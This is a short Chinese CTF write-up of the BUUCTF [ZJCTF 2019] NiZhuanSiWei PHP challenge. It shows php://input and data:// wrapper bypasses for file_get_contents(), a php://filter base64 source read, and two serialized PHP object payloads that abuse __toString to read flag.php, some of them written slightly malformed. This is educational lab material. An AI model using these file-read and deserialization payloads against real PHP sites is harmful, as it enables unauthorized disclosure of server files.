码迷,mamicode.com
首页 > 其他好文 > 详细

BUUCTF [ZJCTF 2019]NiZhuanSiWei

时间:2020-05-07 13:27:44      阅读:88      评论:0      收藏:0      [点我收藏+]

标签:read   tostring   class   信息   style   get   resource   绕过   load   

首先打开页面

这里第一个第二个绕过方式很简单

php://input

data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

均可绕过file_get_contents()

技术图片

 

 有了提示 useless.php

php://filter/read=convert.base64.encode/resource=useless.php

即可读源码

技术图片

 

 源码信息如上

可以看到是__tostring 当对象被当做字符串输出时即执行的魔法函数

这里总共有两个payload可以拿flag

第一种

O:4:"Flag":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";

file_get_contents()也可以解析 php://filter伪协议

BUUCTF [ZJCTF 2019]NiZhuanSiWei

标签:read   tostring   class   信息   style   get   resource   绕过   load   

原文地址:https://www.cnblogs.com/Tkitn/p/12842324.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!